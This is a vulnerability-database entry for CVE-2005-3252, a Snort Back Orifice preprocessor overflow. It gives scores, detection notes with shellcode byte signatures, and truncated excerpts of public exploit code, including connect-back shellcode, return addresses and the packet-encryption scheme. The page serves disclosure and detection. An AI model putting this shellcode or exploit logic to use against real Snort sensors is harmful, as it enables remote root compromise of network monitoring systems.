CVE-2005-3252
Published: 2005-10-18
Priority: P2 (65, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: public exploit code available (see Exploit-DB and Metasploit entries below)
EPSS: 83.50% (99.6th percentile)
Stack-based buffer overflow in the Back Orifice (BO) preprocessor for Snort before 2.4.3 allows remote attackers to execute arbitrary code via a crafted UDP packet.
Affected (3 ranges):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sourcefire | snort | — | — |
| sourcefire | snort | — | — |
| sourcefire | snort | — | — |
Detection & IOCs (extracted from sources)
- bytes: 2a 21 2a 51 57 54 59 3f (hex of the BO magic string "*!*QWTY?")
- bytes: *!*QWTY?
- bytes: \xed\xac\xef\x0d
- bytes: \x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8\x8e\x30\x01\x83\xeb\xfc\xe2\xf4
- bytes: \x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x7a\x69\x66\x53
- bytes: \x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80 (first bytes of the connect-back shellcode in the Russell Sanford exploit listed below)
- Exploit packets are XOR-encrypted using the BO key-stream (seed 0, PRNG: holdrand = holdrand * 214013 + 2531011). Detection should look for UDP packets starting with the encrypted form of '*!*QWTY?' with payload length exceeding 1024 bytes sent to Snort's listening port.
- The BO PING packet type byte is 0x01 (TYPE_PING). Exploit packets carry type=0x01 immediately after the 8-byte magic and the 8-byte length+ID fields.
- Exploit UDP packets are typically ~1400 bytes (PACKETSIZE 1400) or ~1069-1096 bytes depending on the exploit variant. Oversized UDP datagrams to Snort's BO preprocessor port matching the BO magic header are a strong indicator.
- The default exploit target port used by multiple public exploits is UDP/9080; a secondary variant uses UDP/9000. Monitor for large UDP packets to these ports containing the BO magic string.
- Snort versions 2.4.0 through 2.4.2 are confirmed vulnerable; 2.4.3 is the patched version. Identify unpatched Snort instances in the environment.
- The exploit XOR-encrypts the entire BO packet (including the magic header) using a deterministic PRNG seeded at 0 with an empty password (key=31337). A simple plaintext string match for '*!*QWTY?' in UDP payload will NOT detect the exploit traffic; detection must account for the encrypted form or trigger on packet size/structure anomalies.
No detection rules found.
Exploit-DB: Snort Back Orifice - Pre-Preprocessor Remote (Metasploit) (exploitdb, 2010-07-03)

```ruby
##
# $Id: snortbopre.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Au
```
Exploit-DB: Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (4) (exploitdb, 2005-11-11)

```ruby
#!/usr/bin/ruby -w
#
#
# Version 0.1 (Public)
#
# snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
#
# by xwings at mysec dot org
# URL : http://www.mysec.org , somebody need to update the page
#
# Saying Hi to ....
#
# . All the 1337 c0d3r @ pulltheplug.org
# . Gurus from #rubylang @ freenode.net
# . Skywizard @ somewhere right now
# . HITBSecConf CREW and Team Panda
#
# 03:07 hey xwings
# 03:07 why don't you come up and see me sometime?
#
# Tested on :
# Linux debian24 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
# gcc version 3.3.5 (Debian 1:3.3.5-13)
# Snort 2.4.2 , ./configure && make && make install
#
# Use Ruby : http://www.ruby-lang.org
#
#
#
require 'socket'
fathost = ARGV[0]
packetsize
```
Exploit-DB: Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote (3) (exploitdb, 2005-11-11)

```c
/*
* snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit
*
* by Russell Sanford ([email protected])
* -> www.code-junkies.net
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define buffsize 1056
#define COOKIE "*!*QWTY?"
typedef struct {
char magic[8];
int len;
int id;
char type;
char data[buffsize];
char crc;
} BOHEADER;
char buffer[buffsize+5000];
static long holdrand = 31337L;
unsigned int ret_address = 0xbfffebad;
// 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP
char shellcode[] =
"\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68"
"\x45\xc4\x34\x1e" // IP-A
"\x81\x04\x24"
"\x01\x01\x01\x01" // IP-B
"\x68\x01\xff\xfe\x13
```
Exploit-DB: Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow (exploitdb, 2005-10-25)

```c
/*
* THCsnortbo 0.3 - Snort BackOrifice PING exploit
* by [email protected]
* THC PUBLIC SOURCE MATERIALS
*
* Bug was found by Internet Security Systems
* http://xforce.iss.net/xforce/alerts/id/207
*
* v0.3 - removed/cleaned up info for public release
* v0.2 - details added, minor changes
* v0.1 - first release
*
* Greetz to all guests at THC's 10th
* Anniversary (TAX) :>
*
* $Id: THCsnortbo.c,v 1.1 2005/10/24 11:38:59 thccvs Exp $
*
*/
/*
* DETAILS
*
* The bug is in spp_bo.c, BoGetDirection() function
* static int BoGetDirection(Packet *p, char *pkt_data) {
* u_int32_t len = 0;
* u_int32_t id = 0;
* u_int32_t l, i;
* char type;
* char buf1[1024];
*
* ...
* buf_ptr = buf1;
* ...
* while ( i buf1 size.
*
* The exchange of data betwee
```
Exploit-DB: Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit) (exploitdb, 2005-10-18)

```ruby
'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau ',
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['CVE', '2005-3252'],
['OSVDB', '20034'],
['BID', '15131'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget
```
Metasploit: Snort Back Orifice Pre-Preprocessor Buffer Overflow

This module exploits a stack buffer overflow in the Back Orifice pre-processor module included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could be used to completely compromise a Snort sensor, and would typically gain an attacker full root or administrative privileges.
No writeups or analysis indexed.
References:
- http://archives.neohapsis.com/archives/fulldisclosure/2005-10/0505.html
- http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0010.html
- http://secunia.com/advisories/17220
- http://secunia.com/advisories/17255
- http://secunia.com/advisories/17559
- http://securitytracker.com/id?1015070
- http://www.kb.cert.org/vuls/id/175500
- http://www.osvdb.org/20034
- http://www.securityfocus.com/bid/15131
- http://www.snort.org/docs/change_logs/2.4.3/Changelog.txt
- http://www.us-cert.gov/cas/techalerts/TA05-291A.html
- http://www.vupen.com/english/advisories/2005/2138
- http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=362187&RenditionID=
- http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=363396&RenditionID=
- http://xforce.iss.net/xforce/alerts/id/207